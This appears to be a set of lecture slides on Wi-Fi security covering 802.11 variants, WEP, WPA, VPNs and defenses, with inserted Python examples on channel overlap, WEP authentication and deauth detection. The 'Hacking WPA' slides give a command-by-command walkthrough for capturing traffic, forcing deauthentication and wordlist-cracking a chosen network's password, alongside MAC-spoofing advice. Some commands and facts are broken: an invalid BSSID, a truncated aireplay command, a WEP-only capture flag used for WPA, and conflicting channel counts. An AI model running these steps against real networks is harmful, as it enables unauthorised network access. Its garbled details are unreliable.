It is about wireless network vulnerabilities as well as hacking for a Wi-Fi password using airmon, airodump, aireplay and aircrack.
What's IEEE 802.11? • Wireless network security starts with IEEE 802.11, a set of standards for radio communications used in wireless local area networks, or WLANs. • IEEE is an organization composed of engineers, scientists and students that specializes in creating standards for the computer and electronics industry in order to ensure smooth operability and compatibility. The organization uses a number system to represent the standards it comes up with for different technologies. • IEEE uses the number 802 to categorize standards for local and wide area networks, while the number 11 narrows that down to wireless local area networks.
Versions of 802.11 protocols • 802.11a • 802.11b • 802.11g
802.11a • 802.11a has a superior 54-Mbps speed (802.11a was the fastest Wi-Fi protocol available before 802.11g was released). 802.11a operates in the 5 GHz spectrum and has 12 non-overlapping channels. As a result of this higher frequency, 802.11a has a much harder time penetrating through obstacles, such as walls and other objects. This results in a range much lower than 802.11b. • It is less prone to interference from other 5 GHz devices because there are fewer 802.11a and 5 GHz cordless devices deployed in the real world to compete with. • 802.11a makes an excellent choice for building-to-building and backhaul solutions where line of sight is available. Also, 802.11 offers 11 non-overlapping channels.
Cont’d • Advantages • Relatively fast speed; more non-overlapping channels than 802.11b/g; 5 GHz spectrum is less crowded. • Disadvantages • More expensive and shorter range.
802.11b • 802.11b was widely regarded as the most popular form of Wi-Fi. It utilizes frequencies in the 2.4 GHz range (2.400–2.485 GHz) and has 11 channels. However, only three of these channels are truly non-overlapping. • The range (distance) for 802.11b can vary widely, but each access point (with default antennas) typically covers a few hundred feet (indoors) or a few thousand feet (outdoors). With specialized, external antennas, this range can be greatly increased. 802.11b operates in the Industrial, Scientific, and Medical (ISM) unlicensed spectrum. • The top speed for 802.11b is 11 Mbps, but it will auto-negotiate down to rates of 5.5, 2, and 1 Mbps as the signal strength deteriorates. These speeds include a relatively high amount of “overhead,” as required by the protocol to operate.
Cont’d • However, the level of Wi-Fi congestion found in any major metropolitan area is raising the RF noise floor and rendering many long-distance links unusable. • Advantages • Most popular and widely available; least expensive; good coverage. • Disadvantages • Relatively slow speed; interference from other 2.4 GHz devices; only three non-overlapping channels.
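As an added illustration (not part of the original slides), the following Python works out from the 2.4 GHz channel plan which channels are mutually non-overlapping; the 5 MHz channel spacing, the 2407 MHz base and the 22 MHz DSSS signal width are the standard 802.11b values, and the function names are my own.

```python
# Why only three of the eleven 2.4 GHz channels are non-overlapping:
# channel centres sit 5 MHz apart (channel 1 = 2412 MHz) while an 802.11b
# DSSS signal is about 22 MHz wide, so two channels share spectrum unless
# their centres are at least 22 MHz apart.
CHANNEL_SPACING_MHZ = 5
BASE_FREQ_MHZ = 2407        # centre of channel n = 2407 + 5 * n, n = 1..13
SIGNAL_WIDTH_MHZ = 22       # 802.11b DSSS channel bandwidth


def centre_freq(channel: int) -> int:
    """Centre frequency in MHz of a 2.4 GHz channel number (1..13)."""
    return BASE_FREQ_MHZ + CHANNEL_SPACING_MHZ * channel


def overlaps(ch_a: int, ch_b: int) -> bool:
    """True when the two channels' 22 MHz signals share spectrum."""
    return abs(centre_freq(ch_a) - centre_freq(ch_b)) < SIGNAL_WIDTH_MHZ


def non_overlapping(channels) -> list:
    """Greedy left-to-right pick of channels that do not overlap each other."""
    chosen = []
    for ch in sorted(channels):
        if all(not overlaps(ch, c) for c in chosen):
            chosen.append(ch)
    return chosen


if __name__ == "__main__":
    print(non_overlapping(range(1, 12)))    # the usual 1, 6, 11 plan
    print(overlaps(1, 5), overlaps(1, 6))   # adjacent-but-too-close vs clear
```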
802.11g • To keep up with the 54-Mbps speed claims of 802.11a, the 802.11g protocol was ratified in 2003. • This protocol took the OFDM modulation technique of 802.11a and applied it to the 2.4 GHz spectrum of 802.11b. Because it operated in 2.4 GHz, it was possible to remain backwards-compatible with 802.11b equipment. 802.11g radios support both OFDM and DSSS modulation techniques. • Upside: Relatively fast speed; compatible with 802.11b • Downside: Interference from other 2.4 GHz devices; only three non-overlapping channels
Ad-Hoc and Infrastructure Modes • When architecting an 802.11 network, there are two modes in which you can operate: Ad-Hoc (independent basic infrastructure mode) and Infrastructure. • In Ad-Hoc mode all devices are peers with no access point; they communicate directly with each other. • In Infrastructure mode, an AP is connected to a wired infrastructure (such as Ethernet) and all of the wireless devices communicate with the AP. Even if two wireless devices are located right next to each other, all communication between the devices occurs through the AP.
Cont’d • A collection of wireless devices connected to an AP is referred to as a Basic Service Set (BSS). If two or more BSSs are connected together using a “Distribution System” (such as wired Ethernet), the collection of BSSs is referred to as an Extended Service Set (ESS).
Vulnerabilities and Attack Methods • Human Error • Rogue Access Points: it is easy for even a novice to acquire equipment and set up a wireless network. If this is done from within another network, it creates what is known as a subnet, which can create back doors to its parent. There are many easily overlooked mistakes that can be made in configuring a wireless network, many of which novice users will overlook. • Warchalking: using a fairly universal hobo sign language, individuals mark structures that have hotspots associated with them. In many cases these symbols incorporate much information about each node and the type of security currently being implemented. A modern version of HOBO.
MAC Address Spoofing • Media Access Control (MAC) addresses [4] act as personal identification numbers for verifying the identity of authorized clients on wireless networks. However, existing encryption standards are not foolproof. A hacker can pick off authorized MAC addresses and steal bandwidth, corrupt or download files, and wreak havoc on an entire network. • ifconfig | grep wlan0 • Then you can use the macchanger utility to change your MAC address into the legitimate one. • Software such as Kismet or Ethereal can capture the MAC address of an authorized user; hackers can then change their MAC into that real MAC address.
Now the hacker can connect to the wireless LAN and bypass any MAC address filtering. Netstumbler can also be used with a MAC spoofing utility or MAC address modifying utility such as SMAC to achieve the same results.
Man-In-The-Middle Attacks • The key concept behind a MITM attack is exactly as it sounds: one entity with malicious intent intercepts a message between two communicating entities. The hijacker can then send the message on to the receiver as if it had never been delayed, and can even alter the message's content. • The message could be intercepted, altered and sent on to the recipient with fraudulent information. • The message could be blocked and prevented from proceeding any further. • The message could simply be read and sent on its way without the recipient's knowledge.
VPNs • IPSec is the de facto standard for VPNs over the Internet. IPSec defines the way secure data packets are structured through its three major components: the Authentication Header (AH), the Encapsulating Security Payload (ESP), and Internet Key Exchange (IKE). AH is responsible for verifying that packets have not been altered between the sender and receiver. • Common VPN protocols include: • IPSec (IP Security) • PPTP (Point-to-Point Tunneling Protocol) • GRE (Generic Routing Encapsulation) • L2TP (Layer Two Tunneling Protocol)
Types of VPNs • Network-to-network, host-to-network, and host-to-host. • VPNs are a cost-effective way of connecting remote nodes or sites. Alternatives to VPNs, such as dedicated leased lines or deployment of a Remote Access Server, are much more expensive.
Defense • There are different methods for defending your network: • WEP • MAC address blocking • Ditch defaults • Beacon intervals • Access lists • Controlling reset • Disable DHCP • Network auditing and intrusion detection: AirDefense, WiSentry, AirMagnet, NAI Sniffer, WIDZ, AirIDS, Kismet, Snort
Snort: open-source intrusion detection system • Kismet: can detect suspicious hosts such as clients running dictionary attacks and aircrack • HotSpot Defense Kit: monitors the MAC address, ESSID and other indicators that give away a rogue AP, such as a sudden fluctuation in signal strength.
WEP • Wired Equivalent Privacy: uses the stream cipher RC4 for confidentiality and the CRC-32 checksum for integrity. • Two methods of authentication can be used with WEP: Open System authentication and Shared Key authentication. Shared Key authentication works as follows: • The client sends an authentication request to the Access Point. • The Access Point replies with a clear-text challenge. • The client encrypts the challenge text using the configured WEP key and sends it back in another authentication request. • The Access Point decrypts the response. If this matches the challenge text, the Access Point sends back a positive reply.
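The Shared Key exchange above, simulated end to end with both sides' messages, as an added example that is not part of the original slides; RC4 is implemented inline, the CRC-32 ICV comes from zlib, the WEP-40 key and the challenge are constructed values, and the function names are my own.

```python
import os
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA): returns data XOR keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(iv: bytes, key: bytes, plaintext: bytes) -> bytes:
    """WEP body: 3-byte IV || RC4(IV||key, plaintext || CRC-32 ICV)."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + rc4(iv + key, plaintext + icv)


def wep_decrypt(key: bytes, body: bytes):
    """Strip the IV, decrypt with IV||key, verify the ICV; None on mismatch."""
    plain = rc4(body[:3] + key, body[3:])
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None


def ap_challenge() -> bytes:
    """Step 2: the AP answers the auth request with 128 bytes of clear text."""
    return os.urandom(128)


def client_response(challenge: bytes, key: bytes) -> bytes:
    """Step 3: the client encrypts the challenge under its configured key."""
    return wep_encrypt(os.urandom(3), key, challenge)


def ap_verify(challenge: bytes, response: bytes, key: bytes) -> bool:
    """Step 4: the AP decrypts; positive reply only if ICV and text match."""
    return wep_decrypt(key, response) == challenge


if __name__ == "__main__":
    key = bytes.fromhex("0102030405")            # constructed WEP-40 key
    ch = ap_challenge()
    print(ap_verify(ch, client_response(ch, key), key))       # right key
    print(ap_verify(ch, client_response(ch, bytes(5)), key))  # wrong key
```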
WPA • Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. • WPA uses TKIP (Temporal Key Integrity Protocol): the RC4 stream cipher is used with a 128-bit per-packet key, meaning that a new key is dynamically generated for each packet. This makes it more secure.
Hacking WPA • Find out the name of your wireless adapter. • Use the ifconfig command on Kali.
Enable monitor mode • We use airmon-ng to create a virtual monitor-mode interface (mon0 or wlan0mon). Just type: • airmon-ng start wlan0
Kill any processes airmon-ng raises a flag for • You kill using the process identifier and the kill command: • kill 833 • In some situations it is recommended you change your MAC address • You can do that using • macchanger -m 00:11:22:33:44:55 • Before you do this make sure your wlan0 is down, using the ifconfig command • ifconfig wlan0 down • Then bring it back up • ifconfig wlan0 up
Start capturing packets • We’ll use airodump-ng to capture the packets in the air. This tool gathers data from the wireless packets in the air. You’ll see the name of the wifi you want to hack. • airodump-ng wlan0mon • Control+C • airodump-ng -c 1 -w WPA2 --bssid 1d:23:34:45:t6:5y --ivs wlan0mon • Check whether the station connects • aireplay-ng -0 1 -e • or • aireplay-ng --ignore-negative-one -0 1 -a bssid wlan0mon
Brute force • We copy the nmap wordlist from the file system (usr > share > wordlist > nmap) to home • aircrack-ng -w /root/nmap.lst WPA2-01.ivs
Another method is storing captured packets in a file • airodump-ng mon0 --write name_of_file
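From the defender's side, an added example (not part of the original slides) of the kind of check a wireless IDS such as Kismet or the HotSpot Defense Kit from the defense slides performs: it runs over constructed monitor-mode frame records and flags a deauthentication burst of the sort the aireplay-ng -0 step injects, plus a known ESSID beaconed from a BSSID that is not on the authorised list; the thresholds, MAC addresses and function names are my own.

```python
from collections import defaultdict, deque

DEAUTH_THRESHOLD = 5      # this many deauth frames from one sender ...
DEAUTH_WINDOW_S = 2.0     # ... within this many seconds counts as a flood

# Constructed inventory: authorised BSSIDs for each network name
AUTHORISED = {"CorpWiFi": {"00:11:22:aa:bb:01"}, "Guest": {"00:11:22:aa:bb:02"}}

# Constructed capture: (time_s, subtype, source, destination, essid).
# The burst carries the real AP's address because injected deauths are
# spoofed to look as if the AP itself sent them to the broadcast address.
FRAMES = [
    (0.00, "beacon", "00:11:22:aa:bb:01", "ff:ff:ff:ff:ff:ff", "CorpWiFi"),
    (0.10, "beacon", "00:11:22:aa:bb:02", "ff:ff:ff:ff:ff:ff", "Guest"),
    (0.50, "beacon", "de:ad:be:ef:00:01", "ff:ff:ff:ff:ff:ff", "CorpWiFi"),
] + [
    (1.0 + 0.1 * n, "deauth", "00:11:22:aa:bb:01", "ff:ff:ff:ff:ff:ff", "")
    for n in range(8)
] + [
    (9.00, "deauth", "00:11:22:aa:bb:02", "00:aa:bb:cc:dd:01", ""),  # lone, benign
]


def detect(frames, authorised, threshold=DEAUTH_THRESHOLD, window=DEAUTH_WINDOW_S):
    """Return (alert_type, offender, detail) tuples, each reported once."""
    alerts, seen = [], set()
    recent = defaultdict(deque)         # sender -> timestamps of recent deauths
    for t, subtype, src, dst, essid in frames:
        if subtype == "beacon":
            # Rogue / evil-twin AP: a known network name from an unknown BSSID
            if essid in authorised and src not in authorised[essid]:
                key = ("rogue_ap", src, essid)
                if key not in seen:
                    seen.add(key)
                    alerts.append(key)
        elif subtype == "deauth":
            q = recent[src]
            q.append(t)
            while t - q[0] > window:    # forget deauths outside the window
                q.popleft()
            key = ("deauth_flood", src, dst)
            if len(q) >= threshold and key not in seen:
                seen.add(key)
                alerts.append(key)
    return alerts


if __name__ == "__main__":
    for alert in detect(FRAMES, AUTHORISED):
        print(alert)
```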
References • WarDriving, http://www.worldwidewardrive.org • Buerke et al., Wireless Security Attacks and Defenses • Wagner, Robert, "Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks", SANS Institute • http://www.webopedia.com/TERM/D/DoS_attack.html: short for denial-of-service attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. • Cisco Systems, Inc., "A Comprehensive Review of 802.11 Wireless LAN Security and the Cisco Wireless Security Suite", http://www.cisco.com/warp/public/cc/pd/witc/ao1200ap/prodlit/wswpf_wp.pdf, 2002.
References continued • Michael Collins (2014), Network Security Through Data Analysis. Tokyo • Andrew A. et al. (2014), Wi-Foo: Secrets of Wireless Hacking • Lee Barken et al. (2008), Wireless Hacking: Projects for Wi-Fi Enthusiasts